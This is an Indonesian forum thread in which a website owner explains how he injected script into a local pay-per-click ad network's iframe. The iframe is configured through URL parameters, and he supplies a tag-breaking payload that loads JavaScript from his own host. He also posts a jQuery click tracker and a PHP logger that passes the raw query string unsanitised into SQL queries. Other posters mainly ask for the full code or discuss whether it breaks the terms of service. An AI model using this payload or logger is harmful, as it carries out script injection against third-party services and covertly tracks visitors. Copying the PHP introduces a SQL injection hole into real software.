1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

Cara jitu mengontrol Adsense (iframe) bila di Klik oleh pengunjung web kita ...

Discussion in 'Pemrograman Web' started by maxtor, Feb 24, 2010.

Tags:
  1. maxtor

maxtor Newbie

Ok, begini langsung to the poin aja..
    Awalnya begini, web gw walapun nggak punya PR tapi termasuk web dalam kategori trafic tinggi dalam kunjungan. Kebanyakan pengunjung bila gw lihat dari reffernya berasal dari situs google. Suatu hari gw iseng iseng masangin salah satu adsense dari indonesia. Yg buat gw heran neh, bila gw lihat hasilnya di earning selalu saja menunjukkan angka yang sedikit perharinya, padahal seperti yg gw katakan, web gw tuh termasuk web yang banyak dikunjungi. Dari log yg gw buat sendiri, paling sedikit dalam sehari ada sekitar 300 ip adress yang berbeda. Gw betanya-tanya, masa sih dari sekian banyak pengunjung nggak ada satupun yang ngeklik iklan yang ada di web gw?????:pusing:
    Akhirnya dg sedikit nakal gw mengutak atik script yg diberikan adsense tsb, tujuannya cuma satu: gw ingin juga dapat mengontrol (melihat) pengunjung web gw yg melakukan klik di iklan pd web gw.
    Gw lihat celahnya sangat besar untuk melakukan itu, karena adsense tsb dalam mengatur/mengkonfigurasi iklan yg ditayangkan tidak didasarkan pada database, melainkan pada paramater URL yang dihasilkan lewat javascript yg dibuat. Nah di parameter URL itulah gw sisipi script (istilah kerennya phising), yang inti cara kerjanya adalah : Bila link dalam adsense tersebut di klik oleh siapapun maka sebelum halaman web berpindah maka script gw dieksekusi terlebih dulu. Setelah script gw dieksekusi, maka dia akan memberitahu ke file php yg gw siapin sebelumnya lewat metode ajax. Isi file php tersebut hanya mencatat IP adres siapapun yg melakukan klik beserta alamat URL tujuan yang di klik. Di sini gw melakukan filter : tidak boleh ada ip adress yg sama melakukan klik atas alamat adsense yg sama.
    Hasilnya ...???
    Wauw.. sangat berbeda jauh dengan apa yg ditampilin oleh adsense tsb atas klik yg gw peroleh. Hahaha gw yg kena kibul atau gw melanggar aturan ya.....
    Akhirnya gw langsung buang script dari adsense tersebut, untung di dia.. rugi di guwa lah kalo gini caranya terus terusan. Jadi beitu ya caranya, apa dipikir mentang mentang sudah ditaruh pakai metode iframe lantas kita nggak bisa mengontrol...???
    Gw sebenarnya ingin berbagi dg rekan2 script yg gw maksud di sini, tapi gw takut dosa, soalnya udah mematikan rejeki orang lain. Tapi kalo mau cari di google banyak tuh, ada jutaan ... tinggal kita modif aja sesuai keperluan.
    Buat admin, gw mohon maaf, bukan maksud gw mempropokasi di sini, tapi itu realita yang ada di sekitar kita.
    Thanks

2. TUGIRAN

TUGIRAN Ads.id Pro

Sharing disini dong bro.

3. dCartes

dCartes Super Hero

Sharing aja bro.
    Toh ini pengetahuan penting kan.

4. silentlight

silentlight Super Hero

"adsense dari indonesia" ?
    mana ada bro... adsense ya dari google

ppc lokal maksudnya ya ?:peace:

5. maxtor

maxtor Newbie

atas gw: emang gw dapatnya juga dari google, ketik aja keyword "adsense indonesia" ... :)
    oke, gini caranya nya: misalnya di URL yg dihasilkan script untuk mengkases iframe tertulis : httpx://xxxx.com?id=zcvdcasdcs&font=fffff&bacground=000000&border=0000C
    ->perhatikan bagian yg bold.
    diakhir bagian yg di bold kita tambahkan : }</style><script type=text/javascript src=httpx://lokasi_script_gw.js></script><style type=text/css>
    Artinya: bagian warna merah adalah untuk mengakhiri tag bacground=000000, warna biru adalah tag javascript dan menunjukkan lokasi dimana lokasi js kita disimpan, warna hijau adalah untuk meneruskan tag style css yang sebelumnya kita tutup pakai warna biru.

Tapi ingat, nanti dihalaman web kita nulisnya nanti jadi begini : }%3C/style%3E%3Cscript%20type=text/javascript%20src=httpx://lokasi_script_gw.js%3E%3C/script%3E%3Cstyle%20type=text/css%3E
    Sementara sampe sini dulu, selamt mencoba

Last edited: Feb 24, 2010
  6. TUGIRAN

TUGIRAN Ads.id Pro

Bisa kasih contoh langsung dengan adsense gak?

7. abadhy_fkg

abadhy_fkg Ads.id Fan

kalo mau berbagi jangan setengah-setengah. kalo mau bilang, kalo kagak jangan bikn penasaran :swt:

8. togu25

togu25 Hero

Cie penasaran nih ye...sama gue juga penasaran nih...bagi yg utuh dong TS... :D

9. jaya-terus

jaya-terus Banned

Ak gak ngerti maksudnya apaan sih? Udah tak baca2 kok blm mudeng jg...

10. ardi33

ardi33 Super Hero

mau foto jadi kayak avatar ane? inbox aja deh. har
    jah,mo kena ban???:swt::swt::swt:

11. maxtor

maxtor Newbie

PPC apaan seh....? maklum dalam dunia ginian gw masih nubi bangeet..
    Yg gw maksud adsense indonesia tuh ya .. pokokna cari aja di google pasti ketemu bangeeett wkwkwk ..
    dan gw baru dua hari kemaren melakukan aksi cabut tuh script dr web gw, jd keknya dia blom upgrade tuh sistemnya..

Nih script utamanya kalau masih penasaran :
    ini script javascript :
    Code:
    if(typeof jQuery == "function") {
        jQuery(document).ready(function($) {
            init(jQuery, "body");
        });    
        function init($, id) {
            $("div a").click(function() {
                href = $(this).attr('href');
                uri = href.split("#")[0];
                trace_klik(href);    
                return true;
            });                
        }
    }
    Code:
    function trace_klik(url) {
       http.onreadystatechange = handleResponse;
       http.open("GET", 'alamat_ente/trace.php?'+url); 
       http.send(null);   
    }
    ini sript php trace.php

Code:
    <?
    require_once("config.php");
    $url=$_SERVER['QUERY_STRING'];
    $ip=$_SERVER['REMOTE_ADDR'];
    $sq=mysql_query("select * from table where ip='$ip' and url='$url'");
    if(!mysql_num_rows($sq)){mysql_query("insert into table(ip,url) values('$ip','$url')");}
    ?>

Last edited: Feb 25, 2010
  12. Fauzi2406

Fauzi2406 Super Hero

wah sip.....:senyum:

13. maxtor

maxtor Newbie

Gw heran neh ya.. kita kan tujuannya baek, sama-sama fair, sama-sama bisa tau jumlah klik yang diperoleh secara langsung. Kalao dg melakukan itu malah di ban, ya kita pertanyakan kembali kejujuran dia. Mending diperturannya dari awal diganti, tiap 30 klik anda mendapat x rupiah atau 1 klik anda mendapat 0,00x rupiah ...

14. dCartes

dCartes Super Hero

Ane nubitol di adsense.
    Salut ama idenya.
    Dah ane save tuh si code jQuery nya.
    Kan cuma cross check aja sebetulnya.
    Emang melanggar TOS ya.
    Agan2 cerahkan ane plis :hmm:

15. mazarie

mazarie Super Hero

adsense indonesia maksutnya PPC PPC lokal yah bos..??:hmm: ane googling Adsense Indonesia yg nangkring posisi 1 ya adsen**camp.com itu..:silau:

16. p3durungan

p3durungan Super Hero

Koq di BAN??? Maksudnya TS disini kan share cara kita kontrol/verified bener ga sih earning/click yang ditampilkan itu sesuai dengan jumlah actual klik nya. Bukannya untuk boosting atau increasi earning/click nya. Memang modif script itu melanggar TOS alias bakalan di Ban. Tapi script ini kan tujuannya baik supaya pemilik situs/blog mengetahui apakah sepadan hasilnya dengan memasang iklan adsense tersebut.

17. ibnu andhika

ibnu andhika Banned

belum ngerti coding-coding an tapi ini ilmu bermanfaat juga karena PPC indo suka curang dalam melakukan penghitungan earning :nangis:

18. engkoh

engkoh Super Hero

Maap ane kira script yg laen... Ternyata bwt spy bs diliat ya...

19. downloadmaster

downloadmaster Hero

suer pertama kali tadi saat baca sampai tak ulang 3 x, anyway makasih atas infonya... ini sangat membantu meski sedikit menyakitkan, ane dah ngeh maksud ts, makasih ya pren!

20. prafangga

prafangga Super Hero

:senyum: intinya kita dikibulin yach dengan pendapatnan yg sebenarnya klik yang terjadi.:lol:biarin dah lok emang dikibulin ma PPC, toh cuman buat sampingan Blog abal2 bisa buat beli rokok + kopi

Share This Page